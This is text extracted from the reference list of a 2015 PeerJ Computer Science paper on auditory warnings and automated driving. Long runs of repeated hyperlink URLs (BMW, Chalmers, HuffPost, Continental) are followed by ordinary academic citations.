http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://publications.lib.chalmers.se/records/fulltext/174621/local_174621.pdf http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/2013/a_to_z/index.html http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x5/2013/showroom/driver_assistance/park_assistant.html#t=l http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://www.huffingtonpost.com/2013/06/11/siri-voice-man-woman_n_3423245.html http://dx.doi.org/10.1080/15389581003735600 http://dx.doi.org/10.1518/001872096778940859 http://dx.doi.org/10.1016/j.aap.2005.01.007 http://dx.doi.org/10.7717/peerj-cs.13 Continental. 2012. Continental strategy focuses on automated driving. Available at https://www. conti-online.com/www/pressportal com en/themes/press releases/1 topics/automated driving en/ pr 2012 12 18 automated driving en.html (accessed 8 November 2014). Cooke M, Ellis DPW. 2001. The auditory organization of speech and other sources in listeners and computational models. Speech Communication 35:141–177 DOI 10.1016/S0167-6393(00)00078-9. Crump MJC, McDonnell JV, Gureckis TM. 2013. Evaluating Amazon’s Mechanical Turk as a tool for experimental behavioral research. PLoS ONE 8:e57410 DOI 10.1371/journal.pone.0057410. Dagan E, Mano O, Stein GP, Shashua A. 2004. Forward collision warning with a single camera. In: IEEE intelligent vehicles symposium, 2004, Parma, Italy. 71–79. Daimler. 2013. DISTRONIC PLUS: warns and assists the driver. Available at http://www.daimler. com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html (accessed 7 November 2014). De Winter JCF. 2013. Predicting self-reported violations among novice license drivers using pre-license simulator measures. Accident Analysis & Prevention 52:71–79 DOI 10.1016/j.aap.2012.12.018. De Winter JCF, Happee R, Martens MH, Stanton NA. 2014. Effects of adaptive cruise control and highly automated driving on workload and situation awareness: a review of the empirical evidence. Transportation Research Part F: Traffic Psychology and Behaviour 27:196–217 DOI 10.1016/j.trf.2014.06.016. De Winter JCF, Kyriakidis M, Dodou D, Happee R. 2015. Using CrowdFlower to study the relationship between self-reported violations and traffic accidents. In: Proceedings of the 6th international conference on applied human factors and ergonomics (AHFE), Las Vegas, NV. DOI 10.1016/j.promfg.2015.07.514. Desmond P, Hancock P, Monette J. 1998. Fatigue and automation-induced impairments in simulated driving performance. Transportation Research Record: Journal of the Transportation Research Board 1628:8–14 DOI 10.3141/1628-02. Dingus TA, Hulse MC, Barfield W. 1998. Human–system interface issues in the design and use of advanced traveler information systems. In: Barfield W, Dingus TA, eds. Human factors in intelligent transportation systems. Mahwah, NJ: Lawrence Erlbaum Associates, 359–395. Dobler D, Haller M, Stampfl P. 2002. ASR—augmented sound reality [abstract]. In: SIGGRAPH’02 conference abstracts and applications. New York: ACM Press, 148. Ebbatson M. 2009. The loss of manual flying skills in pilots of highly automated airliners. PhD Thesis, Cranfield University. Edworthy J, Hellier E, Rivers J. 2003. The use of male or female voices in warnings systems: a question of acoustics. Noise & Health 6:39–50. European Commision. 2011. Roadmap to a single European transport area—towards a competitive and resource efficient transport system (White Paper, COM(2011) 144 final) Brussels. Ford. 2014. Collision warning with brake support. Available at http://support.ford.com/ maintenance/collision-warning-brake-support (accessed 11 January 2015). Garas J. 2000. Adaptive 3D sound systems. Kluwer Academic Publishers. DOI 10.1007/978-1-4419-8776-1. Bazilinskyy and De Winter (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.13 24/28 https://peerj.com/computer-science/ https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html 